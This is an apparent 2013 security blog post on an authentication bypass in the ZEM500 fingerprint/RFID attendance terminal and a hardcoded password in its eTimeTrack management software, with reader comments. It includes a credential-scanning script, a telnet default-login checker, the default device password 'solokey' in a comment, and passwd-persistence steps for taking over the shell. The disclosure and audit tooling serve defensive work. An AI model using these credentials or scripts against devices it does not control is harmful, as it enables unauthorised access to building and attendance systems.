Thursday, November 21, 2013

ZKSoftware ZEM500 Authentication Bypass


############################################
# ZKSoftware ZEM500 RFID Card Reader
# Date: 22.11.2013
# Vuln: Authentication bypass / Abuse of Access
###########################################

In a world that leans heavily on technology, using software and/or hardware to track people at the office is nothing new. Such systems are actually quite old, and a lot of them are vulnerable. What follows is my observation of the ZEM500 hardware within a limited scope of attack.

Typical connectivity diagram from the ZEM500 hardware to the network:

The ZEM500 by ZKSoftware (resold in India by eSSL) is a combined fingerprint and smart-card terminal used to authenticate employees and keep attendance records in corporate offices. The credentials (employee name, employee password) are encoded on the smart card, as on most such systems. The terminal runs a 2.4.x Linux kernel with a BusyBox userland, and fingerprint matching is its primary authentication method.

Port scan of the ZEM500:

Telnet to the ZEM500:

Malformed packet sent to the ZEM500 using Scapy:

Watching the traffic in Wireshark was not amusing: it revealed employee login / logout details. For obvious reasons of confidentiality and safety, I won't post it online!

eSSL eTimeTrack - hardcoded password:

Apart from the authentication bypass above, eSSL (which resells the hardware in India) distributes its management software, eTimeTrack, at www.esslindia.com/install/eTimeTrack.zip, so anyone can download a copy and drive it the way an administrator would. The management software ships with a hardcoded password for both Windows and SQL Server authentication. Weak encryption, anyone?

The default install includes SQL Server Express as the management database. The software is used to manage and maintain the terminals and to fetch attendance reports from them.
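Hardcoded Windows and SQL Server credentials in the management software are something you can confirm on your own install before trusting it. The script below is an added example (it is not code from this post or from eSSL): it walks an install directory and reports connection-string style secrets (Password=, Pwd=, paired with the nearest preceding User ID= or Uid=), decoding each file both as plain text and as UTF-16LE, the encoding .NET assemblies use for embedded string literals. The sample config, the binary fragment, and every credential in them are constructed for the demonstration and are not the real eTimeTrack values.

```python
"""Scan a management-software install for hardcoded database credentials.

Added example, not code from the post or from eSSL. It looks for
ADO.NET / ODBC connection-string fragments (User ID=, Uid=, Password=, Pwd=)
in every file under a directory, decoding each file both as plain text and
as UTF-16LE, the encoding .NET assemblies use for embedded string literals.
The sample config and binary fragment below, and the credentials in them,
are constructed for the demonstration; they are not the real eTimeTrack values.
"""
import os
import re

_PASS_RE = re.compile(r"(?i)\b(password|pwd|passwd)\s*=\s*([^;\r\n\"'<>]+)")
_USER_RE = re.compile(r"(?i)\b(user id|uid|username|user)\s*=\s*([^;\r\n\"'<>]+)")

# Constructed sample: an app.config as a .NET tool might ship it (made-up values).
SAMPLE_CONFIG = b"""<?xml version="1.0"?>
<configuration>
  <connectionStrings>
    <add name="attendance"
         connectionString="Data Source=.\\SQLEXPRESS;Initial Catalog=attendance;User ID=sa;Password=Hunter2;" />
  </connectionStrings>
</configuration>
"""

# Constructed sample: a few bytes of an assembly with a UTF-16LE string literal in it.
SAMPLE_BINARY = b"\x00MZ junk" + "Server=localhost;Uid=sa;Pwd=letmein;".encode("utf-16-le") + b"\x00\x00"


def scan_bytes(data, source="<bytes>"):
    """Return one finding per password-like assignment found in data.

    Each finding records the encoding it was found under, the nearest preceding
    user name (within 200 characters), and the secret itself."""
    findings = []
    for enc in ("utf-8", "utf-16-le"):
        text = data.decode(enc, "ignore")
        for m in _PASS_RE.finditer(text):
            window = text[max(0, m.start() - 200):m.start()]
            users = _USER_RE.findall(window)
            findings.append({
                "source": source,
                "encoding": enc,
                "user": users[-1][1].strip() if users else None,
                "key": m.group(1),
                "secret": m.group(2).strip(),
            })
    return findings


def scan_tree(root):
    """Scan every regular file under root; unreadable files are skipped."""
    findings = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    findings.extend(scan_bytes(fh.read(), path))
            except OSError:
                continue
    return findings


def masked(f):
    """One-line report with the secret masked, safe to paste into a ticket."""
    return f"{f['source']} [{f['encoding']}] {f['user'] or '?'} / {f['key']}={'*' * len(f['secret'])}"


if __name__ == "__main__":
    for f in scan_bytes(SAMPLE_CONFIG, "app.config") + scan_bytes(SAMPLE_BINARY, "tool.exe"):
        print(masked(f))
```

Run `scan_tree(r"C:\Program Files\eTimeTrack")` (or wherever the install lands) to check the real thing; anything it reports in a .exe or .dll is a credential every copy of the software shares, and the masked line is what goes into the report.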

The ZEM500 also has WiFi capability, and I never hooked my system up to the firewire... Food for thought? ;))

Cheers,
Kish

8 comments:

Mookie said...

What is the default telnet name and login for the ZEM500?

kishfellow said...

Please understand the nature of bug doesn't require you to authenticate.

That's why it is called "bypass"

Cheers!

Anonymous said...

Hi, your work is so amazing!

I'm an IT guy in a company which uses this ZK fingerprint machine. I'm tired of printing this 'timesheet' record every week, because the layout it provides is so old and outdated. As I have some web development and some Linux/database knowledge, I want to hook up directly to the ZEM500 SQL and read from there, so that I may develop some useful and modern clock-management 'software'. What should I do? Since no one in our company except me is monitoring this thing (we use the software it provides, yes), how can I get the password and username for that BusyBox Linux? Thanks a lot!

htlcnn said...

I don't understand what the bypass is after reading your post. Could you please give more details? Thanks!

Guendelman said...

But anyway, what is the default telnet name and login for the device?
From Chile, Claudio

Scarlet Pimpernel said...

I didn't realize something I did for fun, would generate interest... But here goes,

All you have to do is telnet into the box, issue a passwd command to change the password, and then copy the passwd file over to /mnt/mtdblock and /mnt/mtdblock/data:

# passwd
(Once the password has been changed, use the following commands)
# cp /etc/passwd /mnt/mtdblock
# cp /etc/passwd /mnt/mtdblock/data/

The default password for the device that I, ahem, explored was solokey, IIRC.

I am NOT very sure or up to date on the vulnerability as such. It may have been reported and fixed by now (I saw THIS in 2013) - I could be wrong, too... since some vendors don't fix vulnerabilities quickly.

Sorry about the late reply. All of the above were gleaned from my notes in 2013...

Always document the vulnerabilities you play with for later use... :)

Cheers,
Kish
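Putting the telnet section of the post together with the default password given in the comment above, here is an added example (not code from the post) for auditing your own readers: it logs in over telnet with a candidate credential and reports whether a shell prompt comes back. The login name root is an assumption (the post only names the password solokey), as is the shape of the prompts; a constructed fake telnetd stands in for the device so the check can be run offline.

```python
"""Check whether an attendance terminal's telnet service accepts a default login.

Added example, not code from the original post. It speaks just enough of the
telnet login dialogue (login: / Password: prompts, then a shell prompt) to tell
a successful login from a rejected one. Assumptions: the login name "root"
(the post only gives the password "solokey"), and that the shell prompt ends
in "# " or "$ ". A constructed fake telnetd is included so the check runs
offline; point it at a real host and port 23 when auditing your own devices.
"""
import socket
import threading

# "solokey" is the default password named in the post; "root" is an assumption.
DEFAULT_CREDS = [("root", "solokey")]


def _recv_until(sock, markers, timeout):
    """Read until one of the byte markers appears, the peer closes, or we time out."""
    sock.settimeout(timeout)
    buf = b""
    while not any(m in buf for m in markers):
        try:
            chunk = sock.recv(1024)
        except socket.timeout:
            break
        if not chunk:
            break
        buf += chunk
    return buf


def try_login(host, port, user, password, timeout=3.0):
    """Return True if user/password gets a shell prompt from the telnet service."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        # busybox telnetd may prepend IAC option bytes; they are harmless here
        # because we only look for the prompt text.
        if b"ogin:" not in _recv_until(s, [b"ogin:"], timeout):
            return False
        s.sendall(user.encode() + b"\r\n")
        if b"assword:" not in _recv_until(s, [b"assword:"], timeout):
            return False
        s.sendall(password.encode() + b"\r\n")
        reply = _recv_until(s, [b"# ", b"$ ", b"incorrect"], timeout)
        return b"incorrect" not in reply and (b"# " in reply or b"$ " in reply)


def audit_device(host, port=23, creds=DEFAULT_CREDS):
    """Return the (user, password) pairs from creds that the device accepts."""
    return [(u, p) for u, p in creds if try_login(host, port, u, p)]


# ---- constructed fake telnetd, standing in for the device during offline runs ----

def _readline(conn):
    data = b""
    while not data.endswith(b"\n"):
        chunk = conn.recv(1)
        if not chunk:
            return None          # peer hung up
        data += chunk
    return data.decode(errors="replace").strip()


def _serve(listener, user, password):
    """Accept one connection at a time and run a single login attempt on it."""
    while True:
        conn, _ = listener.accept()
        with conn:
            try:
                conn.sendall(b"ZEM500 login: ")
                got_user = _readline(conn)
                if got_user is None:
                    continue
                conn.sendall(b"Password: ")
                got_pw = _readline(conn)
                if (got_user, got_pw) == (user, password):
                    conn.sendall(b"\r\nBusyBox built-in shell (ash)\r\n# ")
                else:
                    conn.sendall(b"\r\nLogin incorrect\r\nZEM500 login: ")
            except OSError:
                continue


def start_fake_device(user="root", password="solokey"):
    """Start the fake telnetd on an ephemeral localhost port; returns (host, port)."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))
    listener.listen(5)
    threading.Thread(target=_serve, args=(listener, user, password), daemon=True).start()
    return listener.getsockname()


if __name__ == "__main__":
    host, port = start_fake_device()
    print("accepted:", audit_device(host, port))   # → [('root', 'solokey')]
```

Against real hardware call `audit_device("192.0.2.10")` with your reader's address; a non-empty result means the terminal is one `passwd` away from a permanent takeover, as the comment above describes, and the fix is to change the password and persist it to the flash copies, or better, to firewall port 23 off the user network entirely.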

Mookie said...

We have a couple of these units for building access. I can telnet into the boxes, but I would really like to script a terminal command that I could send to either device to unlock a door without having to open the GUI and peck around. Any ideas?

Scarlet Pimpernel said...

Beyond the obvious snooping around, I am NOT inclined to post a PoC exploit as such. You can try your hand at bash scripting or Python with a packet-crafting tool like Scapy to send UDP packets (while monitoring with Wireshark); alternately, check whether there's a public exploit for the device.

Cheers!